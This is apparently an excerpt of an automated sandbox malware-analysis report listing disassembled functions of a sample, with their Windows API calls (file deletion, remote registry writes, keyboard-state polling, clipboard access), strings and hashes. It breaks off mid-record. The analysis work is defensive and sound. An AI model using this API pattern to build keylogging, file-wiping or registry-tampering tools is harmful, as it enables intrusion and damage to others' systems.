Part of subcall function 00643698: __flsbuf.LIBCMT ref: 00643713
Part of subcall function 00643698: __flsbuf.LIBCMT ref: 0064372B

__swprintf.LIBCMT ref: 0068C9C4
__swprintf.LIBCMT ref: 0068CA13
__swprintf.LIBCMT ref: 0068CA62

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0068C88A
%02d, xrefs: 0068C91B, 0068C925, 0068C973, 0068C9C2, 0068CA11, 0068CA60
%4d, xrefs: 0068C8CD

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 71605369cea748e70f15fe59854f391f6f4672383e64d8475dacaa471656d865
Instruction ID: 1e57ff5922c3d59946d7cd9a5ee6d4f86a6302995002d86eb4f1ded3a1aea06e
Opcode Fuzzy Hash: 71605369cea748e70f15fe59854f391f6f4672383e64d8475dacaa471656d865
Instruction Fuzzy Hash: 80A14CB1408754ABC754EFA4D885DAFB7EEBF85700F40091EF58587291EA34EA08CF66

Function 0068EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0068EFB6
_wcscmp.LIBCMT ref: 0068EFCB
_wcscmp.LIBCMT ref: 0068EFE2
GetFileAttributesW.KERNEL32(?), ref: 0068EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 0068F00E
FindNextFileW.KERNEL32(00000000,?), ref: 0068F026
FindClose.KERNEL32(00000000), ref: 0068F031
FindFirstFileW.KERNEL32(*.*,?), ref: 0068F04D
_wcscmp.LIBCMT ref: 0068F074
_wcscmp.LIBCMT ref: 0068F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 0068F09D
SetCurrentDirectoryW.KERNEL32(006D8920), ref: 0068F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 0068F0C5
FindClose.KERNEL32(00000000), ref: 0068F0D2
FindClose.KERNEL32(00000000), ref: 0068F0E4

Strings

*.*, xrefs: 0068F048

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: a3acdf50a8293074056b21372665cc9ef49ed089d1f54ec1dc3d2aa036dfb5d2
Instruction ID: de321aaf10174b33b88985fc0624e67aaad5689d33ad1b4cab8a723cabfbe9f7
Opcode Fuzzy Hash: a3acdf50a8293074056b21372665cc9ef49ed089d1f54ec1dc3d2aa036dfb5d2
Instruction Fuzzy Hash: 8D31C3325012196EDB24BBE4DC68BEE77AE9F49360F100276E844E3291DB70EE44CF65

Function 006A0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006A0953
RegCreateKeyExW.ADVAPI32(?,?,00000000,006AF910,00000000,?,00000000,?,?), ref: 006A09C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 006A0A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 006A0A92
RegCloseKey.ADVAPI32(?), ref: 006A0DB2
RegCloseKey.ADVAPI32(00000000), ref: 006A0DBF

Strings

REG_EXPAND_SZ, xrefs: 006A0A2F
REG_DWORD, xrefs: 006A0C83
REG_SZ, xrefs: 006A0AD0
REG_BINARY, xrefs: 006A0D4D
REG_QWORD, xrefs: 006A0D00
REG_MULTI_SZ, xrefs: 006A0B7A

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 38230d4961217c4ee9bb30437ebd14a4e4aa1c1170db6b91f34703865d6d23ab
Instruction ID: 750f0b418becac1ed9669e6ec1c1cfd5bfbce5dcb1933a695c4051dfb95ca51f
Opcode Fuzzy Hash: 38230d4961217c4ee9bb30437ebd14a4e4aa1c1170db6b91f34703865d6d23ab
Instruction Fuzzy Hash: 860258756006119FDB54EF24D851E6AB7E6EF8A310F04895CF88A9B3A2CB34EC01CF95

Function 006366E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON

Download Yara Rule

Strings

UCP), xrefs: 0067110D
BSR_ANYCRLF), xrefs: 0067131E
0Fl, xrefs: 00636747
0El, xrefs: 0063673D
NO_START_OPT), xrefs: 0067114F
LF), xrefs: 006712A4
3cc, xrefs: 006368FF
CR), xrefs: 00671287
ANYCRLF), xrefs: 006712FB
ANY), xrefs: 006712DE
LIMIT_MATCH=, xrefs: 00671170
NO_AUTO_POSSESS), xrefs: 0067112E
pGl, xrefs: 00636751
CRLF), xrefs: 006712C1
0Dl, xrefs: 00636733
_c, xrefs: 00671465, 0067150C, 006715B4
LIMIT_RECURSION=, xrefs: 006711FC
UTF16), xrefs: 006710CF
UTF), xrefs: 006710FA
BSR_UNICODE), xrefs: 00671338

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID: 0Dl$0El$0Fl$3cc$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGl$_c
API String ID: 0-2410777412
Opcode ID: 7185eb594d6550c741ccb442fa87501689a5bdaa84dc7aeac3d96e3bfd06d629
Instruction ID: 27f9f0bc7a89536fda01e6cbb7e95314a78e8fa92e9e3d9a05187d704d222e79
Opcode Fuzzy Hash: 7185eb594d6550c741ccb442fa87501689a5bdaa84dc7aeac3d96e3bfd06d629
Instruction Fuzzy Hash: 62724E75E002199BDB14CF59C8807EEB7B6FF45710F14C16AE85AEB391EB709A81CB90

Function 0068F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0068F113
_wcscmp.LIBCMT ref: 0068F128
_wcscmp.LIBCMT ref: 0068F13F

Part of subcall function 00684385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006843A0

FindNextFileW.KERNEL32(00000000,?), ref: 0068F16E
FindClose.KERNEL32(00000000), ref: 0068F179
FindFirstFileW.KERNEL32(*.*,?), ref: 0068F195
_wcscmp.LIBCMT ref: 0068F1BC
_wcscmp.LIBCMT ref: 0068F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 0068F1E5
SetCurrentDirectoryW.KERNEL32(006D8920), ref: 0068F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 0068F20D
FindClose.KERNEL32(00000000), ref: 0068F21A
FindClose.KERNEL32(00000000), ref: 0068F22C

Strings

*.*, xrefs: 0068F190

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: ee05a906f35f036c6190e3c87307be7c2a8d5f826332decf6f9845efd0015f66
Instruction ID: 7974f6a4d6cac6e3e302704899f47a14501a81253f436b1ba6d7baffb96d4e97
Opcode Fuzzy Hash: ee05a906f35f036c6190e3c87307be7c2a8d5f826332decf6f9845efd0015f66
Instruction Fuzzy Hash: FF31B7365001196ADB24BBE4EC69BEE77AE9F45360F100275E840E3290DB71DF45CF69

Function 0068A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0068A20F
__swprintf.LIBCMT ref: 0068A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 0068A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0068A293
_memset.LIBCMT ref: 0068A2B2
_wcsncpy.LIBCMT ref: 0068A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0068A323
CloseHandle.KERNEL32(00000000), ref: 0068A32E
RemoveDirectoryW.KERNEL32(?), ref: 0068A337
CloseHandle.KERNEL32(00000000), ref: 0068A341

Strings

\, xrefs: 0068A247
\??\%s, xrefs: 0068A22B
:, xrefs: 0068A252

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 37eaf9ba7bfb2f1cfb2a047dcf17b4597a2faf6d776a255b9a7c6162a0209963
Instruction ID: fcffe27ce78eef8ad8b815bcb75d2104ec3e0259daf3175391aad20cd0c39c67
Opcode Fuzzy Hash: 37eaf9ba7bfb2f1cfb2a047dcf17b4597a2faf6d776a255b9a7c6162a0209963
Instruction Fuzzy Hash: F23182B1900109ABDB21AFE0DC49FEB77BEEF89740F1041B6F908D6250E77197448B65

Function 0068001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00680097
SetKeyboardState.USER32(?), ref: 00680102
GetAsyncKeyState.USER32(000000A0), ref: 00680122
GetKeyState.USER32(000000A0), ref: 00680139
GetAsyncKeyState.USER32(000000A1), ref: 00680168
GetKeyState.USER32(000000A1), ref: 00680179
GetAsyncKeyState.USER32(00000011), ref: 006801A5
GetKeyState.USER32(00000011), ref: 006801B3
GetAsyncKeyState.USER32(00000012), ref: 006801DC
GetKeyState.USER32(00000012), ref: 006801EA
GetAsyncKeyState.USER32(0000005B), ref: 00680213
GetKeyState.USER32(0000005B), ref: 00680221

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 3cb871cbbe6c2011070fd17f8bd263958b1ab48960c5a49f03cc37800a6d28d7
Instruction ID: 5a0dd8819fec04189d7f1210d49a8cda484276dfb6b5277213693a18da0d93d5
Opcode Fuzzy Hash: 3cb871cbbe6c2011070fd17f8bd263958b1ab48960c5a49f03cc37800a6d28d7
Instruction Fuzzy Hash: 2351EF309047882DFB75FBA088557EABFB69F02380F084B9DD5C15A2C3DAA49B8CC751

Function 006A03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0069FDAD,?,?), ref: 006A0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006A04AC

Part of subcall function 00629837: __itow.LIBCMT ref: 00629862
Part of subcall function 00629837: __swprintf.LIBCMT ref: 006298AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 006A054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006A05E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 006A0822
RegCloseKey.ADVAPI32(00000000), ref: 006A082F

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 64eae73c24eb2ac7dde60e628bcb48f3a2fe75f9e598fd4c8fd1d138a13afde5
Instruction ID: 2d8c01e566101d8bb66642186af8ecaf33dc0ce706c832f76569e91c1b2c2917
Opcode Fuzzy Hash: 64eae73c24eb2ac7dde60e628bcb48f3a2fe75f9e598fd4c8fd1d138a13afde5
Instruction Fuzzy Hash: BAE16F31604210AFDB54EF24C895D6ABBE6FF8A314F04896DF44ADB261D631ED01CF96

Function 006983BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00629837: __itow.LIBCMT ref: 00629862
Part of subcall function 00629837: __swprintf.LIBCMT ref: 006298AC

CoInitialize.OLE32 ref: 00698403
CoUninitialize.OLE32 ref: 0069840E
CoCreateInstance.OLE32(?,00000000,00000017,006B2BEC,?), ref: 0069846E
IIDFromString.OLE32(?,?), ref: 006984E1
VariantInit.OLEAUT32(?), ref: 0069857B
VariantClear.OLEAUT32(?), ref: 006985DC

Strings

NULL Pointer assignment, xrefs: 006984B3
Failed to create object, xrefs: 00698479, 0069852F
Invalid parameter, xrefs: 006984FA

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: d19700e55840ee858ca692b07a3d9fdeefc8da30df6310167a01173e737bd0dc
Instruction ID: a6792b1a7383dcf0688ef3e99ddf51e45fe68ae7f5cf11e7bf33e24963fd1fdb
Opcode Fuzzy Hash: d19700e55840ee858ca692b07a3d9fdeefc8da30df6310167a01173e737bd0dc
Instruction Fuzzy Hash: E361E4706083129FCB50DF64C848F9EB7EAAF8A754F04441DF9859B691CB70ED49CB92

Function 00694164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0069418B
EmptyClipboard.USER32 ref: 00694191
GlobalAlloc.KERNEL32(00000002,?), ref: 006941A6
CloseClipboard.USER32 ref: 00694245

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 2f90630026b1d4cfb62efc889aced2c212807af0f1a59aea9c7957acdce3e156
Instruction ID: f230954eb73c96d8d22202b448384b548c6fc4f184fc89ad7db22e08cb86dfe8
Opcode Fuzzy Hash: 2f90630026b1d4cfb62efc889aced2c212807af0f1a59aea9c7957acdce3e156
Instruction Fuzzy Hash: 1821BF352006109FDB10AFA0EC09F697BAAFF46350F14802AF9469B2A1CB34BD02CF59

Function 006837EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00624750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00624743,?,?,006237AE,?), ref: 00624770

Part of subcall function 00684A31: GetFileAttributesW.KERNEL32(?,0068370B), ref: 00684A32

FindFirstFileW.KERNEL32(?,?), ref: 006838A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0068394B
MoveFileW.KERNEL32(?,?), ref: 0068395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0068397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 0068399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 006839B9

Strings

\*.*, xrefs: 0068384E, 00683857, 0068386C

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: ccdb5e8269dbf9c2e902f6165552f8ce736f5cd9dabac2a4daef27d128b9bbca
Instruction ID: 3733d9b24c8ccab10ce0b56a6b0bd1ae99f70bf4336b209bfece112356ef1f29
Opcode Fuzzy Hash: ccdb5e8269dbf9c2e902f6165552f8ce736f5cd9dabac2a4daef27d128b9bbca
Instruction Fuzzy Hash: DE517B3180556DAACF15FBA0E992DEDB77AAF11300F600269E40276291EF316F09CF65

Function 0068F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00627DE1: _memmove.LIBCMT ref: 00627E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0068F440
Sleep.KERNEL32(0000000A), ref: 0068F470
_wcscmp.LIBCMT ref: 0068F484
_wcscmp.LIBCMT ref: 0068F49F
FindNextFileW.KERNEL32(?,?), ref: 0068F53D
FindClose.KERNEL32(00000000), ref: 0068F553

Strings

*.*, xrefs: 0068F425

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: e01691087593392a664d4eb52c277bff4a90d97c9c1b0cd8fc7f46bad230cfae
Instruction ID: b740442d82ade455850f12482f1a6b90a974add97e1194d4b4b1074b9cbea8c3
Opcode Fuzzy Hash: e01691087593392a664d4eb52c277bff4a90d97c9c1b0cd8fc7f46bad230cfae
Instruction Fuzzy Hash: 5841B17190021A9FCF54EFA4DC49AEEBBB6FF15310F10456AE815A3291DB30AE85CF91

Function 00633030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

_c, xrefs: 00633322
3cc, xrefs: 00633225

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3cc$_c
API String ID: 674341424-1111051329
Opcode ID: def2e399934e9de21b2cdde25a66d7a8ee49c0d08ae67d97bb9d3fd1852963eb
Instruction ID: 47635ffd8e32e4914e44246dd2b81a931c9b9bfd4dfe3779e42c5961f5e77aeb
Opcode Fuzzy Hash: def2e399934e9de21b2cdde25a66d7a8ee49c0d08ae67d97bb9d3fd1852963eb
Instruction Fuzzy Hash: 8F22BD716087109FD764DF24D881BAFB7E6AF84310F04492CF88A97392DB31EA45CB96

Function 00635760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006358A5
_memmove.LIBCMT ref: 006358F5
_memmove.LIBCMT ref: 0063595B

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: f27a860263b3ab67e6b896b7aeeb230e9ebfe3699a740ac6b1218da4203f535d
Instruction ID: cb22968637a3c9b65dc44b15d49a6064508418579f702fdc28ee8cde5fcaa765
Opcode Fuzzy Hash: f27a860263b3ab67e6b896b7aeeb230e9ebfe3699a740ac6b1218da4203f535d
Instruction Fuzzy Hash: 74129E70A00619DFDF14DFA5D981AEEB7F6FF48300F108569E406E7290EB35A911CBA5

Function 00683B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00624750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00624743,?,?,006237AE,?), ref: 00624770

Part of subcall function 00684A31: GetFileAttributesW.KERNEL32(?,0068370B), ref: 00684A32

FindFirstFileW.KERNEL32(?,?), ref: 00683B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00683BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00683BEA
FindClose.KERNEL32(00000000), ref: 00683C01
FindClose.KERNEL32(00000000), ref: 00683C0A

Strings

\*.*, xrefs: 00683B5B

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 9670d2849cb20f5d8433ea7cb3a0580545f433f6e74b5f9413b6d8bc48e42977
Instruction ID: 3857f9bcd2fa889c4fbb542cf027624e963a76cebb0299d4dab145774633795c
